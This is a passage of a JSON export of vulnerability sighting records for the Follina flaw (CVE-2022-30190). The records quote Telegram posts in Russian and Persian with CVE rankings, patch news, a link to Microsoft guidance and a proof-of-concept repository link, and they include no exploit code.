"https://t.me/proxy_bar/1190", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T06:36:16.000000Z"}, {"uuid": "47ae0439-8683-4f4a-ab7a-85fe4c13df11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/-hSjE6tQsby1bK59117CS79M8pJZfwuegK8pW2OS8URrTA", "content": "", "creation_timestamp": "2022-06-06T13:20:17.000000Z"}, {"uuid": "c0f912e3-1479-48b4-8f98-f6a4e13a56c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/V4aMGqbF9E7u6db2vlWqjJ0xbg8yD-1GzjUeht6dlSqLYG8", "content": "", "creation_timestamp": "2022-09-12T05:42:06.000000Z"}, {"uuid": "33dabe3e-82f4-44f4-9533-ad2cfc7fb043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/492", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "8ad1605e-5738-425d-acc6-dacc72612279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/190", "content": "\u0647\u0634\u062f\u0627\u0631!\n\n\u0646\u0648\u0628\u062a\u06cc \u0647\u0645 \u0628\u0627\u0634\u0647 \u0627\u06cc\u0646 \u0628\u0627\u0631 \u0646\u0648\u0628\u062a \u0645\u0627\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u0650!\n\n\u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0647\u0645 \u062f\u06cc\u06af\u0631\u06cc \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 Diagnosis \u0648\u06cc\u0646\u062f\u0648\u0632 \u0645\u0628\u062a\u06cc \u0628\u0631 \u0634\u0646\u0627\u0633\u0647 CVE-2202-30190 \u062a\u0648\u0633\u0637 \u0628\u062e\u0634 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a\u060c \u062e\u0628\u0631\u0633\u0627\u0632 \u0634\u062f.\n\u0627\u06cc\u0646 \u0636\u0639\u0641 \u0627\u0645\u0646\u06cc\u062a\u06cc \u06a9\u0647 \u0628\u0647 \"Follina\" \u0645\u0639\u0631\u0648\u0641 \u0627\u0633\u062a \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 MSDT \u06cc\u0627 Diagnostic Tools \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u062e\u0637\u0631 \u0648 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0641\u0646\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0627\u06cc\u0646 \u062e\u0635\u0648\u0635 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0644\u06cc\u0646\u06a9 \u0631\u0633\u0645\u06cc \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0645\u0631\u0627\u062c\u0639\u0647 \u0646\u0645\u0627\u06cc\u06cc\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a \u0631\u0633\u0645\u06cc: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "creation_timestamp": "2022-05-31T20:54:26.000000Z"}, {"uuid": "9a81379b-b1bf-41ee-aa69-d51555dd6016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3060", "content": "Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 PatchTuesday \u0437\u0430 \u0438\u044e\u043d\u044c 2022, \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0432 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0435\u043a 0-day Follina.\n\n\u0421\u0440\u0435\u0434\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0445: 3 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 RCE, 51 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u0430 - \u043a\u0430\u043a \u0432\u0430\u0436\u043d\u0430\u044f \u0438 \u043e\u0434\u043d\u0430 - \u043a\u0430\u043a \u0443\u043c\u0435\u0440\u0435\u043d\u043d\u0430\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e,\u00a0\u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 Microsoft Edge \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b 5 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0431\u0449\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: 12 - \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439; 1 - \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, 27 - RCE, 11 - \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, 3 - \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438, 1 - \u0441\u043f\u0443\u0444\u0438\u043d\u0433. \u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0437\u0434\u0435\u0441\u044c.\n\n\u0413\u043b\u0430\u0432\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u0435\u043c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043f\u0430\u0442\u0447\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 Follina, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Windows Microsoft Diagnostic Tool (MSDT) \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word.\n\n\u041f\u043e\u043c\u0438\u043c\u043e CVE-2022-30190 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0440\u0443\u0433\u0438\u0445 RCE \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC \u0438 Azure RTOS GUIX Studio.\n\n\u0415\u0449\u0435 \u043e\u0434\u043d\u0438\u043c \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f\u00a0CVE-2022-30147\u00a0(\u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8), \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u043c \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0438 \u0441 \u043e\u0442\u043c\u0435\u0442\u043a\u043e\u0439 Microsoft - \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430\u044f\u00bb.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0434\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0438\u043b\u044c\u043d\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442, \u0432\u0435\u0434\u044c \u043f\u043e\u043c\u043d\u0438\u0442\u044c\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430\u00a0\u043e\u0447\u0435\u0440\u0435\u0434\u0438\u00a0\u043f\u0435\u0447\u0430\u0442\u0438\u00a0\u0432\u044b\u0445\u043e\u0434\u0438\u043b \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0447\u0443\u0442\u044c \u043b\u0438 \u043d\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u043c\u0435\u0441\u044f\u0446, \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043b \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0430\u0442\u0447, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0434\u043e\u0431\u0438\u043b\u0438 \u0431\u0430\u0433\u0443. \u041d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u0444\u0430\u043a\u0442.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, Microsoft \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u043e\u0431\u043b\u0430\u0436\u0430\u043b\u0438\u0441\u044c: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u043d\u044f\u043b\u043e 2 \u043d\u0435\u0434\u0435\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0442\u043e\u0433\u0434\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0432\u043e\u043f\u0440\u043e\u0441, \u0430 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u043e \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0440\u0430\u043d\u044c\u0448\u0435, \u0432\u0435\u0434\u044c \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435. \u041d\u043e \u043e\u0442\u0432\u0435\u0442 \u0432\u044b \u0443\u0436\u0435 \u0437\u043d\u0430\u0435\u0442\u0435.", "creation_timestamp": "2022-06-15T16:10:07.000000Z"}, {"uuid": "5e064c8f-2fe2-4e15-869a-55709df96bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3129", "content": "\u041d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u044c \u043d\u0430 \u0442\u0435 \u0436\u0435 \u0433\u0440\u0430\u0431\u043b\u0438 \u0432 \u043c\u0438\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0430 \u201c\u043b\u0430\u0442\u0430\u0442\u044c \u0434\u044b\u0440\u044b\u201d \u043f\u043e\u0440\u043e\u0439, \u0441\u0442\u043e\u0438\u0442 \u0431\u043e\u043b\u0435\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e. \n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e \u0447\u0435\u043c \u0440\u0435\u0447\u044c, \u0430 \u0432\u043e\u0442 \u043e \u0447\u0435\u043c: \u043f\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 Google Project Zero \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2022 \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 18 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430 \u041c\u044d\u0434\u0434\u0438 \u0421\u0442\u043e\u0443\u043d\u0430 9 \u0438\u0437 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 0-day, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c, \u0435\u0441\u043b\u0438 \u0431\u044b \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0430 4 \u043e\u0448\u0438\u0431\u043a\u0438 2022 \u0433\u043e\u0434\u0430 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0434\u043d\u0435\u0439 2021 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0421\u0430\u043c\u0430\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0438\u0437 \u044d\u0442\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Windows, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u043f\u043e \u0441\u0443\u0442\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f MSHTML, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043a\u0430\u043a CVE-2021-40444.\n\nCVE-2022-21882 \u2014 \u044d\u0442\u043e \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-1732 .\n\n\u041e\u0448\u0438\u0431\u043a\u0430 iOS IOMobileFrameBuffer (CVE-2022-22587) \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043f\u0443\u0442\u0430\u043d\u0438\u0446\u0435\u0439 \u0442\u0438\u043f\u043e\u0432 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 Chrome V8 (CVE-2022-1096) \u2014 \u044d\u0442\u043e \u0434\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 \u2014 CVE-2021-30983 \u0438 CVE-2021-30551 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u0414\u0440\u0443\u0433\u0438\u043c\u0438 0-day 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0444\u0435\u043a\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f CVE-2022-1364 (Chrome), CVE-2022-22620 (WebKit), CVE-2021-39793 (Google Pixel), CVE-2022-26134 (Atlassian Confluence) \u0438 CVE-2022-26925 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a PetitPotam).\n\n\u0412 \u043e\u0431\u0449\u0435\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0442\u0430\u043a, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u043b\u0438\u0431\u043e \u0441\u043d\u043e\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0435 \u0436\u0435 \u043e\u0448\u0438\u0431\u043a\u0438.\n\n\u042d\u0442\u043e \u0432\u0441\u0435\u0433\u0434\u0430 \u0433\u0440\u043e\u043c\u043a\u043e \u0438 \u0431\u043e\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0442\u0447\u0430\u0441\u0442\u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u043a\u043e\u0433\u0434\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b 0-day \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u044d\u0442\u043e \u043d\u0435\u0443\u0434\u0430\u0447\u0430 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0434\u043b\u044f \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430 \u044d\u0442\u043e \u043f\u043e\u0434\u0430\u0440\u043e\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b, \u0447\u0442\u043e\u0431\u044b \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u043d\u0435\u043b\u044c\u0437\u044f \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.\n\n\u0427\u0442\u043e\u0431\u044b \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0432\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0430\u043d\u0430\u043b\u0438\u0437 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u0447\u0438\u043d \u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043e\u043a, \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f.", "creation_timestamp": "2022-07-04T20:00:05.000000Z"}, {"uuid": "644bb2d6-9cd4-4455-9e18-12fdb641c76e", 